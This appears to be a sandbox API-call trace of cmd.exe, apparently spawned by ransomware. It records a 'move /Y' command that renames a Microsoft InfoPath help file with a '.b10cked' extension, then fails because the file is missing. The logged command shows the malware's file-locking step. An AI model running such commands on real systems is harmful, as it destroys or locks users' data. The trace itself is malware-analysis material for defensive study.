[0203.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.078] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0203.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.078] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0203.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.079] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0203.079] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.079] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0203.079] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.079] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0203.079] GetEnvironmentStringsW () returned 0x320198* [0203.079] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0203.079] GetEnvironmentStringsW () returned 0x320198* [0203.079] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0203.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed24 | out: phkResult=0x22ed24*=0x40) returned 0x0 
[0203.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0xc0, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.079] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x1, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x1, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x0, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x40, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x40, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x40, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegCloseKey (hKey=0x40) returned 0x0 [0203.080] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed24 | out: phkResult=0x22ed24*=0x40) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x40, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x1, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x1, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x0, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x9, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x9, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x9, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegCloseKey (hKey=0x40) returned 0x0 [0203.080] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a5 [0203.080] srand (_Seed=0x5b8863a5) [0203.080] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"" 
[0203.080] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"" [0203.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.081] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0203.081] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.081] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.081] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.081] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0203.081] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0203.081] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0203.081] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0203.081] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0203.081] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0203.081] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0203.081] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0203.081] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0203.081] GetEnvironmentStringsW () returned 0x3222e8* [0203.081] FreeEnvironmentStringsW (penv=0x3222e8) returned 1 [0203.081] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.081] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.081] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0203.081] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0203.081] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0203.081] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0203.081] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0203.081] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0203.081] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0203.081] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0203.081] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22faf0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.082] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22faf0, lpFilePart=0x22faec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22faec*="Desktop") returned 0x18 [0203.082] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0203.082] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f86c | out: lpFindFileData=0x22f86c) returned 0x320028 [0203.082] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0203.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f86c | out: lpFindFileData=0x22f86c) returned 0x320028 [0203.082] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0203.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f86c | out: lpFindFileData=0x22f86c) returned 0x320028 [0203.082] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0203.082] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0203.082] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0203.082] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0203.082] GetEnvironmentStringsW () returned 0x322b08* [0203.083] FreeEnvironmentStringsW (penv=0x322b08) returned 1 [0203.083] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.083] GetConsoleOutputCP () returned 0x1b5 [0203.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.083] GetUserDefaultLCID () returned 0x409 [0203.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0203.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fc30, cchData=128 | out: lpLCData="0") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fc30, cchData=128 | out: lpLCData="0") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fc30, cchData=128 | out: lpLCData="1") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0203.084] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0203.085] GetConsoleTitleW (in: lpConsoleTitle=0x3108f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0203.085] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0203.085] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0203.085] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0203.086] _wcsicmp (_String1="move", _String2=")") returned 68 [0203.086] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0203.086] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0203.086] _wcsicmp (_String1="IF", _String2="move") returned -4 [0203.086] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0203.086] _wcsicmp (_String1="REM", _String2="move") returned 5 [0203.086] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0203.088] GetConsoleTitleW (in: lpConsoleTitle=0x22f928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.089] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0203.089] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0203.089] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0203.089] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0203.089] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0203.089] _wcsicmp 
(_String1="move", _String2="CD") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0203.089] _wcsicmp (_String1="move", _String2="REN") returned -5 [0203.089] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0203.089] _wcsicmp (_String1="move", _String2="SET") returned -6 [0203.089] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0203.089] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0203.089] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0203.089] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0203.089] _wcsicmp (_String1="move", _String2="MD") returned 11 [0203.089] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0203.089] _wcsicmp (_String1="move", _String2="RD") returned -5 [0203.089] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0203.089] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0203.089] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0203.089] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0203.089] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0203.089] _wcsicmp (_String1="move", _String2="VER") returned -9 [0203.089] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0203.089] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0203.089] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0203.089] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0203.089] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0203.089] _wcsicmp (_String1="move", _String2="START") returned -6 [0203.089] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0203.089] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0203.089] _wcsicmp (_String1="move", _String2="MOVE") returned 0 
[0203.091] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.091] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.091] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f6e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f6dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f6dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0203.092] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0203.092] _wcsicmp (_String1="MSINFO~2.HXN", _String2=".") returned 63 [0203.092] _wcsicmp (_String1="MSINFO~2.HXN", _String2="..") returned 63 [0203.092] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msinfo~2.hxn")) returned 0x2022 [0203.093] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.093] SetErrorMode (uMode=0x0) returned 0x0 
[0203.093] SetErrorMode (uMode=0x1) returned 0x0 [0203.093] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", nBufferLength=0x104, lpBuffer=0x22f06c, lpFilePart=0x22f054 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", lpFilePart=0x22f054*="MSINFO~2.HXN") returned 0x27 [0203.093] SetErrorMode (uMode=0x0) returned 0x1 [0203.093] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0203.093] _wcsicmp (_String1="MSINFO~2.HXN", _String2=".") returned 63 [0203.093] _wcsicmp (_String1="MSINFO~2.HXN", _String2="..") returned 63 [0203.093] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msinfo~2.hxn")) returned 0x2022 [0203.093] SetErrorMode (uMode=0x0) returned 0x0 [0203.093] SetErrorMode (uMode=0x1) returned 0x0 [0203.093] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", nBufferLength=0x104, lpBuffer=0x22f4e8, lpFilePart=0x22f280 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", lpFilePart=0x22f280*="MSINFO~2.HXN") returned 0x27 [0203.093] SetErrorMode (uMode=0x0) returned 0x1 [0203.093] SetErrorMode (uMode=0x0) returned 0x0 [0203.093] SetErrorMode (uMode=0x1) returned 0x0 [0203.093] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x22f6f0, lpFilePart=0x22f280 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked", lpFilePart=0x22f280*="MS.INFOPATHEDITOR.14.1033.hxn.b10cked") returned 0x40 [0203.093] SetErrorMode (uMode=0x0) returned 0x1 [0203.093] SetLastError (dwErrCode=0x0) [0203.093] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.infopatheditor.14.1033.hxn.b10cked")) returned 0xffffffff [0203.093] GetLastError () 
returned 0x2 [0203.094] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x22ebfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ebfc) returned 0x310eb0 [0203.094] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x22ebfc | out: lpFindFileData=0x22ebfc) returned 0 [0203.094] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0203.094] GetLastError () returned 0x12 [0203.094] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x22ebfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ebfc) returned 0x310eb0 [0203.094] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x22ebfc | out: lpFindFileData=0x22ebfc) returned 0 [0203.094] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0203.095] GetLastError () returned 0x12 [0203.095] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c08) returned 0x310eb0 [0203.095] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x321c08 | out: lpFindFileData=0x321c08) returned 0 [0203.095] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0203.095] GetLastError () returned 0x12 [0203.095] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c08) returned 0x310eb0 [0203.096] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x321c08 | out: lpFindFileData=0x321c08) returned 0 [0203.096] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0203.096] GetLastError () returned 0x12 [0203.096] _get_osfhandle (_FileHandle=2) returned 0xb 
[0203.096] GetFileType (hFile=0xb) returned 0x2 [0203.211] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0203.211] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22edcc | out: lpMode=0x22edcc) returned 1 [0203.211] _get_osfhandle (_FileHandle=2) returned 0xb [0203.211] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22ee00 | out: lpConsoleScreenBufferInfo=0x22ee00) returned 1 [0203.211] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0203.212] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22ee40 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0203.212] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x22ee24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22ee24*=0x2c) returned 1 [0203.212] longjmp () [0203.212] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.212] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0203.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.213] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0203.213] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.213] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0203.213] SetConsoleInputExeNameW () returned 0x1 [0203.213] GetConsoleOutputCP () returned 0x1b5 [0203.213] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.213] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.213] exit (_Code=1) Process: id = "464" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0xcfc" 
